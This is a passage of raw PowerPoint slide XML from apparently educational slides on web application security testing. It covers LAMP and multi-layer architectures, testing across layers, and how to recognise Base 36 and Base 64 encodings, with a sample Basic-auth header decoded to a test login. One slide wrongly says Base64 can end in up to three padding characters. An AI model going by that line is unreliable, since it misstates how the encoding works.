              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>common abbreviation in describing web applications is LAMP, standing for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Linux, Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>and PHP collaborate to provide a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>combined session/application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>component, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t> provides a separate data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>component</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>independent systems can provide session and application logic while a different set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>of individual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>machines can provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>services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Two-layer </a:t>
            </a:r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Examples: any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>number of blogging, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>content management, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>website hosting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>packages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Apache/PHP software controls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, while the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t> database stores things like blog entries, file metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>control and application functions are implemented in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>PHP code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use of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t> database allows it to easily deliver features like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>searching content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, indexing content, and efficiently replicating it to multiple data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>stores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Variety </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of shapes and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>sizes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Written </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>in all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>kinds of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>languages, they run on every kind of operating system, and they behave in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>every conceivable way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>functionality is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>communicated using HTTP, and its results are typically formatted in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Inputs are communicated using GET, POST, and similar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/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Two-layer </a:t>
            </a:r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Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>of two-layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>application </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Consider tests across </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>the boundary between the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>layers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If presentation/app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>layer is making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>to a data layer, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>to consider tests that address the data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>layer directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>can you find out about the data layer, the relationships in the data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>way the application uses data? </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>test for ways that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>application can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>scramble the data, and ways that bad data can confuse the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>application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Three-layer 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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>developers decide to divide their work into three or more layers, they have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>lot of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>choices about which components they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>choose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>applications that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>complex enough </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>to have three components tend to use heavyweight frameworks like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>J2EE and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JSPs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>can serve as the session layer, while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1"/>
              <a:t>servlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t> implement the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>application layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Finally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, an additional data storage component, like an Oracle or SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Server database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>implements the data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>layer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Three-layer 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Testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>you have several layers, you have several autonomous application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>programming interfaces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>(APIs) that you can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>example, if the presentation layer handles sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>will want to see whether the application layer can be tricked into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>executing instructions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>for one session when it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>pretends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>another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Application- Data Encoding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Recognizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, decoding, and encoding several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>different formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>64, Base 36, Unix time, URL encoding, HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>encoding etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>be hidden form field values, GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> parameters in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>the URL, or values in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Data can be small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, like a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>6-character discount </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>code, or they might be large, like hundreds of characters with an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>internal composite structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>a tester, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>do boundary case testing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>negative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>testing that addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" i="1" dirty="0"/>
              <a:t>interesting cases, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" i="1" dirty="0"/>
              <a:t>figure out what is interesting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>understand the format and use of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>data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is difficult to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>methodically generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>boundary values and test data if you do not understand how the input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>is structured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– Data Encoding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Base 36</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>Base 16, it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>begins at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>0 and carries on into the alphabet after reaching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>9, it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>does not stop at F, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>however, It includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>all 26 letters up to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Unlike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>Base 64, however, it does not distinguish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>between uppercase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>and lowercase letters and it does not include any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>punctuation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>So</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>, if you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>see a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>mixture of letters and numbers, and all the letters are the same case (either all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>upper or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>all lower), and there are letters in the alphabet beyond F, you’re probably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>looking at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>a Base-36 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>number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Application- Data Encoding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Base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>the entire alphabet, upper- and lowercase, as well as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>ten digits 0–9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>That </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>gives us 62 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>in plus (+) and solidus (/) and we have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>64 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Equals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>sign is also part of the set, but it will only appear at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>end</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>lways </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>contain a number of characters that is a multiple of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>input data does not encode to an even multiple of 4 bytes, one or more equals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(=) will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>be added to the end to pad out to a multiple of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Thus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>, you will see at most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>3 equals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>, but possibly none, 1, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>hallmark of Base 64 is the trailing equals. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Failing that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>, it is also the only encoding that uses a mixture of both upper- and lowercase letters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Application- Data Encoding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For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>you see dGVzdHVzZXI6dGVzdHB3MTIz in an HTTP header, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>you might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>be tempted to just change characters at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>random</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Decoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>this with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Base-64 decoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>, however, reveals the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>“testuser:testpw123”</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Gives better idea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
              <a:t>of the data, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>knowledge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" dirty="0"/>
